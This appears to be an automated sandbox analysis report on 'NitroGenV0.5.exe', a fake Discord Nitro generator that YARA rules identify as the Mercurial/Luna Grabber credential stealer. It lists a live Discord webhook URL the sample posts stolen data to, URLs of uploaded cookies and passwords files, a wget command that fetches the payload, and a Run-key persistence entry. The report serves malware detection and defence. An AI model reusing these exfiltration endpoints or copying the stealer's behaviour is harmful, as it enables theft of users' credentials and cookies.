                        Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810339021168680/cookies.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810341642612736/passwords.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810352568766474/Capture.jpg
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://cdn.discordapp.com/avatars/
                        Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: https://discord.com
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://discord.com8
                        Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: https://discord.comx
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://discordapp.com/api/v8/users/
                        Source: NitroGenV0.5.exe.6.drString found in binary or memory: https://i.imgur.com/vgxBhmx.png
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://i.imgur.com/vgxBhmx.pngultipart/form-data
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://ip4.seeip.org
                        Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: https://ip4.seeip.org/
                        Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: https://ip4.seeip.orgx
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810248877211688/cookies.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810251381211176/passwords.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810260252164166/Capture.jpg
                        Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810339021168680/cookies.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810341642612736/passwords.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810352568766474/Capture.jpg
                        Source: NitroGenV0.5.exe, 00000006.00000002.302816261.0000000002D42000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350548671.000000000285E000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://www.countryflags.io/
                        Source: NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: https://www.countryflags.io/CH/flat/48.png
                        Source: unknownHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

                        E-Banking Fraud:

                        barindex
                        Yara detected MercurialGrabberShow sources
                        Source: Yara matchFile source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
                        Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPEDMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPEDMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPEDMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPEDMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BB61F66_2_00007FFC08BB61F6
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BBBD996_2_00007FFC08BBBD99
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BB6FA26_2_00007FFC08BB6FA2
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC08936FA217_2_00007FFC08936FA2
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC0893BD9917_2_00007FFC0893BD99
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC089361F617_2_00007FFC089361F6
                        Source: NitroGenV0.5.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: NitroGenV0.5.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
                        Source: unknownProcess created: C:\Users\user\Desktop\download\NitroGenV0.5.exe "C:\Users\user\Desktop\download\NitroGenV0.5.exe"
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile created: C:\Users\user\AppData\Local\Temp\cookies.dbJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.win@8/11@7/5
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                        Source: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_01
                        Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected

                        Data Obfuscation:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeUnpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeUnpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
                        Source: C:\Windows\SysWOW64\wget.exeCode function: 4_2_009F29B6 pushfd ; ret 4_2_009F2CF2
                        Source: C:\Windows\SysWOW64\wget.exeCode function: 4_2_009EC354 push eax; ret 4_2_009EC355
                        Source: C:\Windows\SysWOW64\wget.exeCode function: 4_2_009EC350 push eax; ret 4_2_009EC351
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC08930443 pushad ; ret 17_2_00007FFC08930451
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\wget.exeFile created: C:\Users\user\Desktop\download\NitroGenV0.5.exeJump to dropped file
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial GrabberJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial GrabberJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
